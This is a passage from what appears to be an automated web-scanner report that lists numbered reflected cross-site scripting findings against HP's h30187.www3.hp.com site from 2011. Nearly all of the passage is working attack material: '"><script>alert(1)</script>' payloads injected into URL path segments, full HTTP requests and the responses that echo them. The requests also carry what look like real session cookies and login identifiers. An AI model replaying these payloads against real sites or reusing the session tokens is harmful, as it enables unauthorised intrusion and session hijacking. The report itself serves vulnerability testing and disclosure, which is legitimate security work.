Content-Length: 30887


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is18d0a"><script>alert(1)</script>829490b7dd7/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.41. http://h30187.www3.hp.com/is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c73a"><script>alert(1)</script>ca2e809aac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is7c73a"><script>alert(1)</script>ca2e809aac9/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:37 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 31045


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is7c73a"><script>alert(1)</script>ca2e809aac9/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.42. http://h30187.www3.hp.com/is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 610a4"><script>alert(1)</script>1cb31b9e7a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is610a4"><script>alert(1)</script>1cb31b9e7a8/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:33 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is610a4"><script>alert(1)</script>1cb31b9e7a8/ec0a3f9959/p/productId/104920/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.43. http://h30187.www3.hp.com/is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aca59"><script>alert(1)</script>64456137cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isaca59"><script>alert(1)</script>64456137cdb/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:38 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 31017


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isaca59"><script>alert(1)</script>64456137cdb/f8069e08a0/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.44. http://h30187.www3.hp.com/pv.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /pv.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd428"><script>alert(1)</script>30a6c3b6743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pv.gifbd428"><script>alert(1)</script>30a6c3b6743?s=null&cid=700&u=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jspca059%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Eaf8ce681eb5&nocache=1315176274807 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392C1E4830C54ECB49A6E4104218808A781F7C4F8A19AB96069A029839FFE95A122B91AE95A1A2770D491AC17E946292851; JSESSIONID=abcu_31OsxeEtfZ2jN2it; EMID=

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 22:44:56 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#EwXjHLlvV+s=; path=/; expires=Sat, 23-Sep-2079 01:59:03 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 31452


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/pv.gifbd428"><script>alert(1)</script>30a6c3b6743?printable=true&u=http%3A%2F%2Fh30187.www3.hp.com%2Findex.jspca059%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253Eaf8ce681eb5&s=null&nocache=1315176274807&cid=700">
...[SNIP]...

3.45. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/builder.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6084c"><script>alert(1)</script>69270061d23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources6084c"><script>alert(1)</script>69270061d23/scripts/builder.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30858


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources6084c"><script>alert(1)</script>69270061d23/scripts/builder.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.46. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/builder.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb48a"><script>alert(1)</script>3f76bf537ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptscb48a"><script>alert(1)</script>3f76bf537ca/builder.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:01 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 30777
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptscb48a"><script>alert(1)</script>3f76bf537ca/builder.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.47. http://h30187.www3.hp.com/resources/scripts/builder.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/builder.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41dd4"><script>alert(1)</script>b17d3fbe7e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/builder.js41dd4"><script>alert(1)</script>b17d3fbe7e4?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:07 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30765


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/builder.js41dd4"><script>alert(1)</script>b17d3fbe7e4?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.48. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/controls.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f38"><script>alert(1)</script>c169c88a19c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcesb1f38"><script>alert(1)</script>c169c88a19c/scripts/controls.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30804


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcesb1f38"><script>alert(1)</script>c169c88a19c/scripts/controls.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.49. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/controls.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae318"><script>alert(1)</script>97c24640801 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsae318"><script>alert(1)</script>97c24640801/controls.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30779


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsae318"><script>alert(1)</script>97c24640801/controls.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.50. http://h30187.www3.hp.com/resources/scripts/controls.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/controls.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2499c"><script>alert(1)</script>0bcb6abd0c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/controls.js2499c"><script>alert(1)</script>0bcb6abd0c9?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/controls.js2499c"><script>alert(1)</script>0bcb6abd0c9?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.51. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/cmdatatagutils.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728fa"><script>alert(1)</script>591dcd90ff0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources728fa"><script>alert(1)</script>591dcd90ff0/scripts/coremetrics/cmdatatagutils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30779


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources728fa"><script>alert(1)</script>591dcd90ff0/scripts/coremetrics/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.52. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/cmdatatagutils.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb23"><script>alert(1)</script>ad6b72789ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsdcb23"><script>alert(1)</script>ad6b72789ff/coremetrics/cmdatatagutils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30841


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsdcb23"><script>alert(1)</script>ad6b72789ff/coremetrics/cmdatatagutils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.53. http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/cmdatatagutils.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 706b0"><script>alert(1)</script>aeaafebd9d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics706b0"><script>alert(1)</script>aeaafebd9d9/cmdatatagutils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
